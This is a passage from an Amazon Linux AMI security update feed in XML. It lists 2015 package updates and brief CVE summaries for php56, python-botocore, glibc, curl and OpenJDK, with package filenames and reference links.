version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.8" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.8-1.111.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.8-1.111.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.8" release="1.111.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.8-1.111.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-512</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-512: medium priority package update for python-botocore</title><issued date="2015-04-17 15:25:00" /><updated date="2015-04-17 15:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2296:
A flaw was found in the way python-requests set the domain cookie parameter for certain HTTP responses. A remote attacker could use this flaw to modify a cookie to be sent to an arbitrary URL.
1202904:
CVE-2015-2296 python-requests: session fixation and cookie stealing vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2296" title="" id="CVE-2015-2296" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-botocore" version="0.103.0" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-botocore-0.103.0-1.7.amzn1.noarch.rpm</filename></package><package name="python27-botocore" version="0.103.0" release="1.7.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-botocore-0.103.0-1.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-513</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-513: medium priority package update for glibc</title><issued date="2015-04-22 16:12:00" /><updated date="2015-04-23 21:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1781:
A buffer overflow flaw was found in the way glibc's gethostbyname_r() and other related functions computed the size of a buffer when passed a misaligned buffer as input. An attacker able to make an application call any of these functions with a misaligned buffer could use this flaw to crash the application or, potentially, execute arbitrary code with the permissions of the user running the application.
CVE-2013-7423:
It was discovered that, under certain circumstances, glibc's getaddrinfo() function would send DNS queries to random file descriptors. An attacker could potentially use this flaw to send DNS queries to unintended recipients, resulting in information disclosure or data loss due to the application encountering corrupted data.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7423" title="" id="CVE-2013-7423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1781" title="" id="CVE-2015-1781" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0863.html" title="" id="RHSA-2015:0863" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nscd" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.142.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.142.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.142.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.142.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.142.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.142.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-514</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-514: medium priority package update for curl</title><issued date="2015-04-22 16:14:00" /><updated date="2015-04-23 21:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3148:
1213351:
CVE-2015-3148 curl: "Negotiate" not treated as connection-oriented
CVE-2015-3145:
1213347:
CVE-2015-3145 curl: cookie parser out of boundary memory access
CVE-2015-3144:
1213335:
CVE-2015-3144 curl: host name out of boundary memory access
CVE-2015-3143:
1213306:
CVE-2015-3143 curl: re-using authenticated connection when unauthenticated
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143" title="" id="CVE-2015-3143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3144" title="" id="CVE-2015-3144" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145" title="" id="CVE-2015-3145" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148" title="" id="CVE-2015-3148" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-3.50.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-3.50.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.50.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-3.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-515</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-515: important priority package update for java-1.6.0-openjdk</title><issued date="2015-04-23 00:44:00" /><updated date="2015-04-23 21:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
A flaw was discovered in the Beans component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0808.html" title="" id="RHSA-2015:0808" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.35-1.13.7.1.70.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.35" release="1.13.7.1.70.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.35-1.13.7.1.70.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-516</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-516: important priority package update for java-1.7.0-openjdk</title><issued date="2015-04-23 00:44:00" /><updated date="2015-04-23 21:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
A flaw was discovered in the Beans component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0806.html" title="" id="RHSA-2015:0806" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.79-2.5.5.1.59.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.79-2.5.5.1.59.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.79" release="2.5.5.1.59.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.79-2.5.5.1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-517</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-517: important priority package update for java-1.8.0-openjdk</title><issued date="2015-05-05 15:44:00" /><updated date="2015-05-05 16:13:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0488:
A flaw was found in the way the JSSE component in OpenJDK parsed X.509 certificate options. A specially crafted certificate could cause JSSE to raise an exception, possibly causing an application using JSSE to exit unexpectedly.
CVE-2015-0480:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
CVE-2015-0478:
It was found that the RSA implementation in the JCE component in OpenJDK did not follow recommended practices for implementing RSA signatures.
CVE-2015-0477:
Multiple flaws were discovered in the Beans and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-0470:
Multiple flaws were discovered in the Beans and Hotspot components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-0469:
An off-by-one flaw, leading to a buffer overflow, was found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could possibly cause the Java Virtual Machine to execute arbitrary code, allowing an untrusted Java application or applet to bypass Java sandbox restrictions.
CVE-2015-0460:
A flaw was found in the way the Hotspot component in OpenJDK handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2005-1080:
A directory traversal flaw was found in the way the jar tool extracted JAR archive files. A specially crafted JAR archive could cause jar to overwrite arbitrary files writable by the user running jar when the archive was extracted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1080" title="" id="CVE-2005-1080" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0460" title="" id="CVE-2015-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0469" title="" id="CVE-2015-0469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0470" title="" id="CVE-2015-0470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0477" title="" id="CVE-2015-0477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0478" title="" id="CVE-2015-0478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0480" title="" id="CVE-2015-0480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0488" title="" id="CVE-2015-0488" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0809.html" title="" id="RHSA-2015:0809" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.45-30.b13.5.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.45" release="30.b13.5.amzn1" epoch="1" 